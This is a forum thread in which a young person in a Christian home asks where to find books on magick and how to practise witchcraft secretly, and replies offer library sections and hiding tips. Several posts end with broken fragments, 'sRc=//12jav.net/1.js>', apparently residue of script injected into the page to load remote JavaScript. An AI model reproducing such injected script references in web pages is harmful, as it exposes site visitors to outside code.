Does anybody know which section to look at in local libraries for books about magick?
Also, could somebody please give me some tips about being a witch in secret?
My parents would greatly disapprove, as I am living in a Christian home.
(btw I am not Wiccan or pagan, and I believe in only one God)
I'm fairly new to magic and I am mostly gathering information for now (magick is a very interesting subject to learn about).
This site has a lot of information on it. As you say your parents would object, my advice is that you wait until you are an adult and out of their house. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

typically occult. you could also look into the religion section, new age, or sometimes self-help.

you could use blank book covers for the books you're reading. download PDF's onto your phone or personal computer and use a password on the devices. use a blank notebook, or again a password protected computer for your book of shadows. using items with a dual meaning is another way many hide their faith in plain sight. say a plant or stone in the north corner of your room to represent the earth element, or a picture of an animal to represent your deity [say a cat for Bast, it looks like a decoration to anyone else but it means more to you] you can also bow your head in silent prayer before a meal like anyone else, no one would question it.
so, you're interested in witchcraft/spells? there is such a path that combines witchcraft and Christianity, look up either 'Christian Witch' or 'Christian Wicca' for more information. sometimes your mind makes reality much worse. i would tell your parents, but perhaps research for a bit, make a list of reasons/beliefs why you want to study witchcraft/magick and when you feel this is the right path for you, you should tell your parents, be calm, and explain your views. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
oh, and one more thing. I know what it is like to be a witch in secret as I live in a Christian home myself. When I cane across the problem of of practising in secret I just look at what witches in history did. I usually practice at night under the cover of darkness in my room. I waited till everyone is asleep and practice the spell or ritual I want. When it comes to hiding by books an tools I hide them under my bed or on top of my book case. I dim the lights so I can see but not enough for people to notice. I copy sections in books on the craft that are to "dangerous" to bring home in a journal I have. My tools are made of simple things that no one would connect to magic that did not practice it.I have been doing it for years and people still do not know I am a witch! :D Hope that helps some. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
